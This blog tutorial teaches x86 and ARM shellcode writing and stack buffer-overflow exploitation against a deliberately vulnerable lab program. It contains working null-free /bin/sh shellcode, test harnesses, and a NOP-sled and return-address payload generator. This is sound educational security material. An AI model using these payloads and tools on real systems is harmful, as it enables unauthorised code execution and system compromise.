Introduction to exploit development - Part 3: Shellcode

Nov 2, 2025

#security #exploit-development #systems #x86 #ARM #shellcode #assembly #linux

Overview

In Part 2, we learned how stack-based buffer overflows enable control flow hijacking by corrupting saved return addresses. We demonstrated redirecting execution to existing functions in the target program. That is interesting but limiting, because we can only jump to code that already exists in the program.

The next step is shellcode: custom machine instructions injected into a vulnerable program's memory and executed to achieve arbitrary code execution. This post explores shellcode development for both x86 and ARM architectures, covering:

Assembly fundamentals and system call interfaces
Writing position-independent shellcode that spawns shells
Eliminating null bytes that terminate string operations
NOP sled technique for reliable exploitation
Return-Oriented Programming (ROP) when the stack is non-executable
Testing and debugging shellcode effectively

All x86 work below uses the Debian i386 VM, while ARM work uses the Debian armhf VM or Raspberry Pi configured in Part 1.

A bit or two of assembly

Before writing shellcode, we review basic assembly for both architectures by implementing a simple "Hello, World!" program that uses system calls directly.

x86 hello world

hello.s (x86 AT&T syntax):

.section .data
msg:
    .ascii "Hello, World!\n"
    msg_len = . - msg

.section .text
.globl _start

_start:
    # write(1, msg, msg_len)
    movl $4, %eax          # syscall number for write
    movl $1, %ebx          # file descriptor 1 (stdout)
    leal msg, %ecx         # pointer to message
    movl $msg_len, %edx    # message length
    int $0x80              # invoke syscall

    # exit(0)
    movl $1, %eax          # syscall number for exit
    xorl %ebx, %ebx        # exit code 0
    int $0x80              # invoke syscall

Assemble, link, and execute:

as hello.s -o hello.o
ld hello.o -o hello
./hello
# Output: Hello, World!

Key concepts:

System calls: On 32-bit x86 Linux, system calls are invoked via int $0x80 interrupt
Calling convention: Syscall number in eax, arguments in ebx, ecx, edx, esi, edi, ebp (in that order)
Return value: Returned in eax

Reference: Linux x86 syscall table

ARM hello world

hello.s (ARM):

.section .data
msg:
    .ascii "Hello, World!\n"
    .set msg_len, . - msg

.section .text
.globl _start

_start:
    # write(1, msg, msg_len)
    mov r7, #4             @ syscall number for write
    mov r0, #1             @ file descriptor 1 (stdout)
    ldr r1, =msg           @ pointer to message
    ldr r2, =msg_len       @ message length
    svc #0                 @ invoke syscall (supervisor call)

    # exit(0)
    mov r7, #1             @ syscall number for exit
    mov r0, #0             @ exit code 0
    svc #0                 @ invoke syscall

Assemble, link, and execute:

as hello.s -o hello.o
ld hello.o -o hello
./hello
# Output: Hello, World!

Key concepts:

System calls: On ARM Linux, system calls are invoked via svc #0 (supervisor call, formerly swi)
Calling convention: Syscall number in r7, arguments in r0, r1, r2, r3, r4, r5, r6 (in that order)
Return value: Returned in r0

Reference: Linux ARM syscall table

These examples demonstrate the fundamental differences between x86 and ARM assembly and their system call interfaces, details we must account for when writing our shellcode in the following sections.

Testing shellcode

Before developing shellcode, we need a way to test it. Originally, I used a C program to help with this (based off of code from Hacking by Jon Erickson), but later created a more flexible Python script to speed things up. I've included both below:

C shellcode test harness

shellcode.c

#include <stdio.h>

// Replace with your shellcode bytes
unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    "\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void) {
    printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1);

    // Cast shellcode array to function pointer and execute
    void (*execute_shellcode)() = (void(*)())shellcode;
    execute_shellcode();

    return 0;
}

Compile with executable stack:

gcc shellcode.c -z execstack -o shellcode
./shellcode

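This approach is simple but requires recompilation for each shellcode test. Note that the shellcode array lives in the data segment, not on the stack. The -z execstack flag still matters here because, on many Linux kernels, a binary marked as needing an executable stack has its other readable mappings made executable as well. Newer kernels have tightened this behaviour, so if the harness segfaults immediately, use the Python harness below instead.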

Python shellcode test harness

A more flexible approach is to use Python's ctypes library to change memory protection and execute shellcode directly. This is what the test_shellcode function in the shellcode.py script below does. The script also includes some helper functions that we'll use later; you can ignore them for now.

shellcode.py

#!/usr/bin/env python3
import argparse
import ctypes
import subprocess
from pathlib import Path


def string_to_little_endian_hex(data):
    """
    Convert a string or bytes object to little endian hex representation.

    Example: string_to_little_endian_hex("/bin") -> 0x6e69622f

    Args:
        data: String or bytes to convert to hex
    """
    # Encode string to bytes if needed
    if isinstance(data, str):
        data = data.encode("ascii")

    # Convert to hex and reverse byte order for little endian
    hex_bytes = [data.hex()[i : i + 2] for i in range(0, len(data.hex()), 2)]
    little_endian = "".join(reversed(hex_bytes))
    print(f"0x{little_endian}")


def print_shellcode(executable_name, bytes_only=False):
    """
    Extract shellcode opcodes from an assembled and linked executable.

    IMPORTANT: Link your executable with the -N flag:
        ld your_program.o -N -o your_program

    Args:
        executable_name: Name of the executable to extract opcodes from
        bytes_only: If True, print only the hex bytes (compatible with test command)
    """
    binary_file = Path(f"{executable_name}.bin")

    # Create binary file using objcopy
    result = subprocess.call(["objcopy", "-O", "binary", executable_name, str(binary_file)])
    if result != 0:
        print("Could not create binary file. Please assemble and link your code first")
        return

    # Read binary data and format as shellcode
    binary_data = binary_file.read_bytes()

    if bytes_only:
        # Print hex bytes only (no 0x prefix, no \x separators)
        print("".join(f"{byte:02x}" for byte in binary_data))
    else:
        # Print with length and \x format
        shellcode = "".join(f"\\x{byte:02x}" for byte in binary_data)
        print(f"Shellcode for {executable_name} has length: {len(binary_data)}\n{shellcode}")

    # Clean up temporary file
    binary_file.unlink()


def test_shellcode(shellcode_bytes):
    """
    Create an executable function from shellcode bytes.

    Marks memory pages as executable and returns a callable function pointer.

    Args:
        shellcode_bytes: Bytes object containing assembly opcodes

    Returns:
        Callable function that executes the shellcode
    """
    # Create C buffer and cast to function pointer
    shellcode = ctypes.create_string_buffer(shellcode_bytes)
    function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))

    # Get function address and libc instance
    addr = ctypes.cast(function, ctypes.c_void_p).value
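    libc = ctypes.CDLL("libc.so.6")
    # Declare mprotect's signature so addresses are passed as pointers, not C ints
    libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int]
    pagesize = libc.getpagesize()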

    # Calculate page-aligned starting address
    addr_page = (addr // pagesize) * pagesize

    # Mark all pages containing shellcode as executable (READ|WRITE|EXEC)
    for page_start in range(addr_page, addr + len(shellcode_bytes), pagesize):
        assert libc.mprotect(page_start, pagesize, 0x7) == 0

    return function


if __name__ == "__main__":
    p = argparse.ArgumentParser(description="Shellcode utilities")
    sp = p.add_subparsers(dest="cmd", required=True)
    sp.add_parser("hex", help="Convert string to little-endian hex").add_argument("data")
    print_parser = sp.add_parser("print", help="Extract shellcode from executable")
    print_parser.add_argument("exe")
    print_parser.add_argument("-b", "--bytes", action="store_true", help="Print only hex bytes (compatible with test command)")
    sp.add_parser("test", help="Execute shellcode").add_argument("bytes", help="Hex string (e.g., 31c050)")
    args = p.parse_args()

    if args.cmd == "hex":
        string_to_little_endian_hex(args.data)
    elif args.cmd == "print":
        print_shellcode(args.exe, bytes_only=args.bytes)
    elif args.cmd == "test":
        test_shellcode(bytes.fromhex(args.bytes))()

This script uses mprotect() to mark the memory page containing our shellcode as executable, eliminating the need for -z execstack. This is more representative of real-world exploitation where we mark specific memory regions executable rather than the entire stack.
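To see why test_shellcode loops over pages instead of calling mprotect() once, here is the page arithmetic on its own. This is a small sketch with made-up addresses and an assumed 4096-byte page size; pages_covering is a hypothetical helper, not part of shellcode.py.

```python
def pages_covering(addr, length, pagesize=4096):
    """Return the start address of every page touched by [addr, addr + length)."""
    first_page = (addr // pagesize) * pagesize  # round down to a page boundary
    return list(range(first_page, addr + length, pagesize))


# A 33-byte buffer that starts 8 bytes before a page boundary spans two pages,
# so both must be made executable.
print([hex(p) for p in pages_covering(0x1FF8, 33)])

# The same buffer placed well inside a page needs only one.
print([hex(p) for p in pages_covering(0x1100, 33)])
```

mprotect() only accepts page-aligned addresses, which is why the start address is rounded down before the loop begins.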

Writing shellcode: x86

Shellcode development follows a process:

Identify the goal (e.g., spawn a shell)
Determine required system calls
Write assembly that achieves the goal
Eliminate problematic bytes (null bytes, newlines, etc.)
Extract opcodes and test

Our goal in this series will always be to spawn a /bin/sh shell using the execve() system call.

Understanding execve()

The execve() system call replaces the current process with a new program:

int execve(const char *pathname, char *const argv[], char *const envp[]);

To spawn a shell:

pathname: pointer to string "/bin/sh"
argv: array containing ["/bin/sh", NULL]
envp: can be NULL

On x86:

Syscall number: 11 (0xb)
Arguments: ebx = pathname, ecx = argv, edx = envp

First attempt: bad_shell.s (x86)

bad_shell.s

.data
    shell: .ascii "/bin/shX"

.text
.global _start
_start:
    ### execve("/bin/sh", NULL, NULL); ###
    mov $11, %eax       # Store syscall for execve (11) in %eax
    mov $shell, %ebx    # Store the address of the "/bin/shX" string in %ebx
    movb $0, 7(%ebx)    # Overwrite the last byte (X) of the string with NULL
    mov $0, %ecx        # Store NULL in %ecx (argv)
    int $0x80           # Interrupt to make the syscall

    ### exit(0); ###
    movl $1, %eax   # Store syscall for exit (1) in %eax
    movl $0, %ebx   # Store the exit value we want to return in %ebx
    int $0x80       # Interrupt to make the syscall

Assemble, link, and test:

as bad_shell.s -o bad_shell.o
ld bad_shell.o -o bad_shell
./bad_shell
# Should spawn a shell

This works, but let's examine the opcodes.

Using objdump:

# objdump -d bad_shell

bad_shell:     file format elf32-i386

Disassembly of section .text:

08049000 <_start>:
 8049000:	b8 0b 00 00 00       	mov    $0xb,%eax
 8049005:	bb 00 a0 04 08       	mov    $0x804a000,%ebx
 804900a:	c6 43 07 00          	movb   $0x0,0x7(%ebx)
 804900e:	b9 00 00 00 00       	mov    $0x0,%ecx
 8049013:	cd 80                	int    $0x80
 8049015:	b8 01 00 00 00       	mov    $0x1,%eax
 804901a:	bb 00 00 00 00       	mov    $0x0,%ebx
 804901f:	cd 80                	int    $0x80

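Using shellcode.py (after relinking with ld -N, as the script's docstring requires; -N places .data directly after .text, which is why the address operand of the second instruction differs from the objdump listing above):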

# ./shellcode.py print bad_shell
Shellcode for bad_shell has length: 41
\xb8\x0b\x00\x00\x00\xbb\x75\x80\x04\x08\xc6\x43\x07\x00\xb9\x00\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\x2f\x62\x69\x6e\x2f\x73\x68\x58

The disassembly reveals a whopping 16 null bytes (\x00). Null bytes terminate C string operations such as strcpy() and strcat(), so the copy stops at the first one and the rest of our shellcode never reaches memory. They gotta go.
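Counting null bytes by eye gets tedious, so here is a minimal sketch that does it for the .text bytes from the objdump listing above. The helper names bad_byte_offsets and strcpy_view are made up for illustration and are not part of shellcode.py.

```python
# .text bytes of bad_shell, copied from the objdump listing
BAD_SHELL = bytes.fromhex(
    "b80b000000"  # mov $0xb,%eax
    "bb00a00408"  # mov $0x804a000,%ebx
    "c6430700"    # movb $0x0,0x7(%ebx)
    "b900000000"  # mov $0x0,%ecx
    "cd80"        # int $0x80
    "b801000000"  # mov $0x1,%eax
    "bb00000000"  # mov $0x0,%ebx
    "cd80"        # int $0x80
)


def bad_byte_offsets(code, bad=b"\x00"):
    """Return the offset of every byte in code that also appears in bad."""
    return [i for i, byte in enumerate(code) if byte in bad]


def strcpy_view(code):
    """Return the prefix a strcpy()-style copy would transfer (stops at the first NUL)."""
    return code.split(b"\x00", 1)[0]


offsets = bad_byte_offsets(BAD_SHELL)
print(f"{len(offsets)} null bytes, first at offset {offsets[0]}")
print(f"strcpy() would copy only {len(strcpy_view(BAD_SHELL))} of {len(BAD_SHELL)} bytes")
```

The bad parameter accepts any set of bytes, so the same check works for targets that also choke on newlines or spaces, for example bad=b"\x00\x0a\x20".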

Eliminating null bytes: good_shell.s (x86)

To get rid of null bytes, we can apply some of the following techniques:

XOR for zeroing: Instead of mov $0, %eax, use xor %eax, %eax
Push strings onto stack: Instead of referencing the data segment, construct strings on the stack at runtime
Clever arithmetic: Build values through arithmetic instead of direct assignment

Let's see an example of this:

good_shell.s

.text
.global _start
_start:
    ### execve("/bin/sh", ["/bin/sh", NULL], NULL); ###
    xor %eax, %eax      # XOR %eax with itself, zeroing it out
    push %eax           # Push %eax (NULL) onto the stack
    push $0x68732f2f    # Push "//sh" onto the stack
    push $0x6e69622f    # Push "/bin" onto the stack, %esp now points to it
    mov %esp, %ebx      # %ebx now holds the starting address of "/bin//sh"
    push %eax           # Push %eax (NULL) onto the stack
    push %ebx           # Push %ebx (pointer to "/bin//sh\0") onto the stack, %esp now points to it
    mov %esp, %ecx      # %ecx now holds starting address of ["/bin//sh", NULL]
    xor %edx, %edx      # XOR %edx with itself, zeroing it out
    mov $11, %al        # Store syscall for execve (11) in %eax, via %al
    int $0x80           # Interrupt to make the syscall


    ### exit(0); ###
    xor %eax, %eax      # XOR %eax with itself, zeroing it out
    mov $1, %al         # Store syscall for exit (1) in %eax, via %al
    xor %ebx, %ebx      # Store the exit value we want to return in %ebx by XORing it to get 0
    int $0x80           # Interrupt to make the syscall
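The two push immediates in the listing above are simply the string "/bin//sh" cut into 4-byte pieces and read as little-endian integers. The sketch below shows that derivation; push_immediates is a hypothetical helper in the same spirit as the hex subcommand of shellcode.py.

```python
import struct


def push_immediates(text):
    """Split text into 4-byte chunks and return them as little-endian
    integers in push order (last chunk first, since the stack grows down)."""
    if len(text) % 4 != 0:
        raise ValueError("pad the string to a multiple of 4 bytes first")
    chunks = [text[i:i + 4] for i in range(0, len(text), 4)]
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]


# "/bin//sh" is "/bin/sh" padded to 8 bytes; the doubled slash is harmless
# because path resolution treats "//" like "/".
for value in push_immediates(b"/bin//sh"):
    print(f"push $0x{value:08x}")
```

Padding with an extra slash is what lets the string fill two whole words, so no push has to carry a null byte.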

Assemble:

as good_shell.s -o good_shell.o
ld good_shell.o -o good_shell

Extract the opcodes and check for null bytes (again, you can use objdump, or the print option from the shellcode.py script given earlier):

./shellcode.py print good_shell

As you'll see, no null bytes!

Final x86 shellcode (33 bytes):

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80

Test this shellcode using the Python shellcode.py script given earlier:

./shellcode.py test $(./shellcode.py print -b good_shell)
# Should spawn a shell

Writing shellcode: ARM

ARM has some obvious differences compared to x86, namely:

Different instruction encoding and addressing modes
Thumb mode (16-bit instructions) can reduce null bytes
Branch instructions for mode switching

First attempt: bad_shell.s (ARM)

bad_shell.s

.syntax unified

.data
    shell: .ascii "/bin/sh\0"

.text
.global _start

_start:
    .code 32
    @@@ execve("/bin/sh", 0, 0); @@@
    ldr r0, shell_addr  @ Load executable we want to execute in r0
    mov r1, 0           @ Store NULL in r1
    mov r2, 0           @ Store NULL in r2
    mov r7, 11          @ Store the syscall for execve (11) in r7
    swi 0               @ Software interrupt to make the syscall

    @@@ exit(0); @@@
    mov r0, 0           @ Store the exit value we want to return in r0
    mov r7, 1           @ Store the syscall for exit (1) in r7
    swi 0               @ Software interrupt to make the syscall

shell_addr:
    .word shell

Assemble and test:

as bad_shell.s -o bad_shell.o
ld bad_shell.o -o bad_shell
./bad_shell

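Check for null bytes (as the shellcode.py docstring notes, relink with ld -N first so that .text and .data are extracted as one contiguous blob):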

./shellcode.py print bad_shell
Shellcode for bad_shell has length: 44
\x18\x00\x9f\xe5\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x78\x00\x01\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00

We find 14 null bytes. Time to get creative.

Eliminating null bytes: good_shell.s (ARM)

For better ARM shellcode, we'll apply several techniques (some of which are similar to what we did for x86):

Switch to Thumb mode: Use 16-bit instructions to reduce null bytes
Program-relative addressing: Used to load string addresses
XOR for zeroing: Use eor (exclusive OR) to zero registers instead of direct assignment
Writable .text section: We'll store the string data in the .text section and reach it with relative addressing. Because the shellcode patches the string's last byte at runtime, testing it as a standalone binary requires a writable text segment (via the -N linker flag)

good_shell.s

.section .text
.global _start

_start:
    .code 32
    add r3, pc, #1      @ r3 = PC + 1; the set low bit selects Thumb state on bx
    bx r3               @ Branch and exchange to switch to Thumb mode (LSB = 1)

    .code 16
    @@@ execve("/bin/sh", NULL, NULL); @@@
    add r0, pc, #8      @ Use program-relative addressing to load the address of our string into r0
    eor r1, r1, r1      @ XOR r1 with itself, zeroing it out
    eor r2, r2, r2      @ XOR r2 with itself, zeroing it out
    strb r2, [r0, #7]   @ Overwrite the last byte of "/bin/shX" with 0 (NULL)
    mov r7, #11         @ Store syscall for execve (11) in r7
    svc #1              @ Supervisor call; #1 rather than #0 keeps a null byte out of the encoding

.ascii "/bin/shX"
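The two PC-relative adds in the listing above only work because of how ARM reports PC: in ARM state it reads as the current instruction's address plus 8, and in Thumb state as the address plus 4 (word-aligned for PC-relative adds). Here is a sketch of that arithmetic using offsets within the shellcode; the function names are made up for illustration.

```python
def arm_pc(instr_offset):
    """In ARM state, reading PC yields the current instruction's address + 8."""
    return instr_offset + 8


def thumb_pc_aligned(instr_offset):
    """In Thumb state, PC reads as address + 4; PC-relative ADD word-aligns it."""
    return (instr_offset + 4) & ~3


# Layout: two 4-byte ARM instructions, then six 2-byte Thumb instructions,
# then the "/bin/shX" string.
THUMB_START = 2 * 4
STRING_START = THUMB_START + 6 * 2

# add r3, pc, #1 sits at offset 0: r3 = offset of the Thumb code, with bit 0 set
r3 = arm_pc(0) + 1
# add r0, pc, #8 is the first Thumb instruction
r0 = thumb_pc_aligned(THUMB_START) + 8

print(f"r3 = {r3} (Thumb code at {THUMB_START}, low bit set)")
print(f"r0 = {r0} (string at {STRING_START})")
```

If you add or remove an instruction between the add and the string, the immediate in add r0, pc, #8 has to change to match.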

Assemble with writable text section:

as good_shell.s -o good_shell.o
ld -N good_shell.o -o good_shell  # -N makes text segment writable
./good_shell

Extract the opcodes and check for null bytes:

./shellcode.py print good_shell

Final ARM shellcode (28 bytes):

\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58

Test this shellcode using the Python shellcode.py script given earlier:

./shellcode.py test $(./shellcode.py print -b good_shell)
# Should spawn a shell

Exploiting

Now that we have working shellcode, we face a problem: how do we actually get a vulnerable program to execute it? In Part 2, we exploited buffer overflows by redirecting the saved return address to existing functions. But now we want to inject our custom shellcode into memory and execute it.

The challenge is that we need to know the exact memory address where our shellcode resides. If we overwrite the return address with the wrong value, the program crashes instead of executing our shellcode. This is tricky because:

Stack addresses vary based on environment variables, command-line arguments, and program state
We rarely have perfect information about where our injected data ends up
Even small miscalculations cause crashes instead of exploitation

The so-called NOP sled technique solves this problem by making exploitation more reliable when we don't know the exact address where our shellcode will land in memory.

NOP sleds

A NOP sled is a sequence of NOP (No Operation) instructions preceding our shellcode. When the program jumps into the NOP sled, execution "slides" through the NOPs until reaching our shellcode.

Why this helps: When exploiting real programs, we often don't know the exact stack address where our shellcode begins. Environment variables, command-line arguments, and ASLR (when enabled) affect stack layout. A large NOP sled means we only need to jump somewhere in the sled - any address within hundreds of bytes works.

NOP opcodes:

x86: \x90 (one byte, simple)
ARM: More complex - ARM doesn't have single-byte NOPs. Common alternatives:
- mov r1, r1 (four bytes: \x01\x10\xa0\xe1)
- Must be 4-byte aligned for ARM execution mode
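To make the difference between the two sleds concrete, the sketch below counts how many return-address guesses lead cleanly into the shellcode. The sled address is made up, and lands_in_sled is a hypothetical helper written only for this illustration.

```python
def lands_in_sled(guess, sled_start, sled_len, nop_size=1):
    """True if jumping to guess executes whole NOPs and then the shellcode.

    nop_size is 1 for the x86 NOP byte 0x90 and 4 for ARM-mode mov r1, r1.
    """
    inside = sled_start <= guess <= sled_start + sled_len
    on_boundary = (guess - sled_start) % nop_size == 0
    return inside and on_boundary


SLED_START = 0xBFFFF000  # made-up address for illustration
SLED_LEN = 1000
candidates = range(SLED_START - 8, SLED_START + SLED_LEN + 8)

# x86: every address in the sled, plus the shellcode's first byte, is a valid target
x86_hits = sum(lands_in_sled(g, SLED_START, SLED_LEN) for g in candidates)
# ARM: only addresses on a 4-byte instruction boundary decode as intended
arm_hits = sum(lands_in_sled(g, SLED_START, SLED_LEN, nop_size=4) for g in candidates)

print(f"x86 valid targets: {x86_hits}")
print(f"ARM valid targets: {arm_hits}")
```

The ARM sled still covers the same address range, but only a quarter of the addresses inside it are usable, which is why alignment gets its own section later on.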

Environment variable injection

Instead of injecting shellcode directly into the vulnerable buffer (which may be too small), we store shellcode in an environment variable and redirect execution to that address.

Export shellcode to environment:

Example on x86:

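export SHELLCODE=$(python3 -c 'import sys; sys.stdout.buffer.write(b"\x90" * 1000 + b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80")')

This creates an environment variable with 1000 NOP instructions followed by our shellcode. We write raw bytes through sys.stdout.buffer because print() on a Python 3 str would UTF-8-encode bytes such as \x90 into two bytes each and corrupt the payload.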

Now we need the memory address of this environment variable. One way to get it is the following helper program (credit goes to Hacking by Jon Erickson):

getenv_addr.c

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char *ptr;

    if(argc < 2) {
        printf("Usage: %s <environment variable name>\n", argv[0]);
        return 1;
    }

    ptr = getenv(argv[1]);
    printf("%s is at address: %p\n", argv[1], (void *)ptr);

    return 0;
}

Compile and use:

gcc getenv_addr.c -o getenv_addr
./getenv_addr SHELLCODE
# Output: SHELLCODE is at address: 0xbeffef55 (example address)

Important: The address will vary slightly between programs due to environment differences. For exploitation, we can just estimate an address in the middle of our NOP sled.

Creating a payload generator

Rather than manually crafting payloads with inline Python, let's use a helper script that consolidates our exploit primitives. The nop.py script given below provides three subcommands:

shellcode: Generate a NOP sled followed by architecture-specific shellcode
buffer: Generate a buffer filled with an environment variable's address (for overwriting return addresses)
debug: Generate an alphabetic pattern for identifying offsets

nop.py

#!/usr/bin/env python3
import argparse
import ctypes
import sys
import os

X86_SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53"
    b"\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80"
)

ARM_SHELLCODE = (
    b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71"
    b"\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58"
)


def hex_string_to_little_endian_bytes(hex_string):
    """Convert a hex string to little endian bytes."""
    hex_bytes = [int(hex_string[i : i + 2], 16) for i in range(0, len(hex_string), 2)]
    return bytes(reversed(hex_bytes))


def print_env_buffer(var_name, target_path, buf_size):
    """
    Print a buffer containing the address of an environment variable.

    The function accounts for the difference in program name length between
    this script and the target executable, then adds an offset to land inside
    the NOP sled rather than at its start.
    """
    if isinstance(var_name, str):
        var_name = var_name.encode("ascii")

    libc = ctypes.CDLL("libc.so.6")
    get_env = libc.getenv
    get_env.restype = ctypes.c_void_p

    # Program name affects env var memory location - each extra character
    # shifts the address. Calculate the difference between this script's
    # invocation name and the target program name.
    script_name = sys.argv[0]
    name_diff = len(script_name) - len(target_path)
    # Each character difference shifts the address by 1 byte on the stack.
    # Add 500 to land in the middle of a typical 1000-byte NOP sled.
    env_addr = get_env(var_name) - name_diff + 500
    hex_addr = f"{env_addr:08x}"

    # Each copy of the address is 4 bytes, so buf_size // 4 copies fill buf_size bytes
    sys.stdout.buffer.write(
        hex_string_to_little_endian_bytes(hex_addr) * (buf_size // 4)
    )

def warn_small_nop_sled(size):
    """Print a warning if NOP sled size is less than 1000 bytes."""
    if size < 1000:
        print(
            f"Warning: NOP sled size {size} is less than 1000 bytes. "
            f"The 'buffer' subcommand assumes a 1000-byte sled (offset +500). "
            f"Consider using a larger sled or adjusting the offset.",
            file=sys.stderr,
        )

def print_debug_buffer(buf_size):
    """
    Print a buffer with repeating alphabet characters (AAAABBBBCCCC...).

    If buf_size is larger than 104 (26 * 4), the pattern is prefixed with
    (buf_size - 104) '@' (ASCII 0x40) characters.
    """
    char_buff = "".join(chr(c) * 4 for c in range(ord("A"), ord("Z") + 1))

    if len(char_buff) > buf_size:
        print(char_buff[:buf_size])
    else:
        print("@" * (buf_size - len(char_buff)) + char_buff)


def print_shellcode(buf_size, arch):
    """Print a NOP sled followed by shellcode."""
    if arch == "x86":
        nop_sled = b"\x90" * buf_size
        shellcode = X86_SHELLCODE
    else:
        # ARM NOP instruction (mov r1, r1)
        nop_sled = b"\x01\x10\xa0\xe1" * (buf_size // 4)
        shellcode = ARM_SHELLCODE

    sys.stdout.buffer.write(nop_sled + shellcode)


if __name__ == "__main__":
    p = argparse.ArgumentParser(description="Exploit payload generator")
    sp = p.add_subparsers(dest="cmd", required=True)

    shellcode_parser = sp.add_parser("shellcode", help="Print NOP sled + shellcode")
    shellcode_parser.add_argument("size", type=int, help="Size of NOP sled")
    shellcode_parser.add_argument(
        "-a", "--arch", choices=["x86", "arm"], default="x86",
        help="Target architecture",
    )

    buf_parser = sp.add_parser("buffer", help="Print buffer with env var address")
    buf_parser.add_argument("var", help="Environment variable name")
    buf_parser.add_argument("target", help="Path to target executable")
    buf_parser.add_argument("size", type=int, help="Buffer size")

    debug_parser = sp.add_parser("debug", help="Print alphabetic debug buffer")
    debug_parser.add_argument("size", type=int, help="Buffer size")

    args = p.parse_args()

    if args.cmd == "shellcode":
        warn_small_nop_sled(args.size)
        print_shellcode(args.size, args.arch)
    elif args.cmd == "buffer":
        print_env_buffer(args.var, args.target, args.size)
    elif args.cmd == "debug":
        print_debug_buffer(args.size)

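One detail worth noting is the adjustment in print_env_buffer(). Environment variable addresses shift with the length of the program name, so the script corrects for the difference between its own name and the target's, then adds an offset to aim for the middle of the NOP sled rather than its start. The correction is only approximate, since nop.py runs under the Python interpreter and its stack differs from victim's in more ways than the name length, but a 1000-byte sled leaves plenty of margin for that error.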

Exploiting victim.c using NOP sleds

Consider a simple vulnerable program:

victim.c

#include <string.h>

void vulnerable(char *input) {
    char buffer[100];
    strcpy(buffer, input);  // No bounds checking
}

int main(int argc, char *argv[]) {
    if(argc < 2) return 1;
    vulnerable(argv[1]);
    return 0;
}

Compile:

# x86
gcc -m32 -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 \
    victim.c -o victim

# ARM
gcc -fno-stack-protector -z execstack victim.c -o victim

Now, to actually start exploiting we can follow a general set of steps:

Export NOP sled + shellcode to an environment variable
Determine or guess the exploitable buffer (padding) length
Create the injection payload, including the padding to overwrite the return address + address pointing to NOP sled
Execute victim with payload

For ARM, there are a few extra considerations to make, as discussed in the next section. But for now, let's focus on x86.

First, determine the padding needed to reach the saved return address. The debug subcommand generates an alphabetic pattern (@@@@@@AAAABBBBCCCC...) that helps identify exact offsets:

gdb -batch -ex "run $(./nop.py debug 120)" -ex "info registers eip" ./victim
# eip            0x58585858  0x58585858

The value 0x58585858 is ASCII for "XXXX", meaning EIP was overwritten by the X's. The pattern repeats each letter 4 times (AAAA at offset 0, BBBB at 4, ..., XXXX at 92), and 16 (120 - 104) @'s were prepended because we specified a buffer size of 120, so the saved return address starts at offset 16 + 92 = 108. A precise payload is therefore 108 bytes of padding followed by the 4-byte address into our NOP sled, 112 bytes in total.
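The offset arithmetic can also be done mechanically. The sketch below rebuilds the debug pattern the same way nop.py does and looks up where the bytes found in EIP sit inside it; return_address_offset is a hypothetical helper, not a nop.py subcommand.

```python
def debug_pattern(buf_size):
    """Rebuild the string that `nop.py debug <buf_size>` prints."""
    letters = "".join(chr(c) * 4 for c in range(ord("A"), ord("Z") + 1))
    if len(letters) > buf_size:
        return letters[:buf_size]
    return "@" * (buf_size - len(letters)) + letters


def return_address_offset(eip, buf_size):
    """Offset in the pattern of the 4 bytes that ended up in EIP."""
    needle = eip.to_bytes(4, "little").decode("ascii")
    return debug_pattern(buf_size).index(needle)


print(return_address_offset(0x58585858, 120))
```

Because every letter appears exactly once as a 4-byte group, the lookup is unambiguous as long as the return address is 4-byte aligned within the pattern.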

Now export our shellcode with a 1000-byte NOP sled:

export SHELLCODE=$(./nop.py shellcode -a x86 1000)

Finally, exploit the vulnerable program. The buffer subcommand generates a buffer filled with the calculated address of our environment variable:

./victim $(./nop.py buffer SHELLCODE ./victim 240)
# Should spawn a shell

Victim has been pwned!! But wait, what just happened?

The buffer subcommand did the following:

Looked up the SHELLCODE environment variable address
Adjusted for the program name length difference between nop.py and ./victim
Added an offset to land inside the NOP sled (not at the exact start)
Generated 240 bytes of this address repeated
- Note how this buffer is much bigger than our precise finding of 108 bytes! Using GDB to find the exact offset was just for fun. We didn't need that precision, because the buffer is nothing but the target address repeated, and since the offset (108) is a multiple of 4, one of the copies lands exactly on the saved return address

When executed, the overwritten return address points into our NOP sled in the environment variable. Execution slides through NOPs and hits our shellcode, spawning a shell.
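Why does a buffer of repeated addresses work without knowing the exact offset? The sketch below illustrates the idea with a made-up target address: any return-address offset that is a multiple of 4 lines up with one full copy. This is a simplified model rather than nop.py's exact code, and the helper names are hypothetical.

```python
import struct


def address_spray(addr, size):
    """Return size bytes consisting of addr repeated in little-endian form."""
    return struct.pack("<I", addr) * (size // 4)


def overwrites_return(payload, ret_offset, addr):
    """True if the 4 bytes at ret_offset are exactly the target address."""
    return payload[ret_offset:ret_offset + 4] == struct.pack("<I", addr)


TARGET = 0xBFFFF1F4  # made-up address somewhere inside the NOP sled
spray = address_spray(TARGET, 240)

print(overwrites_return(spray, 108, TARGET))  # offset measured with GDB above
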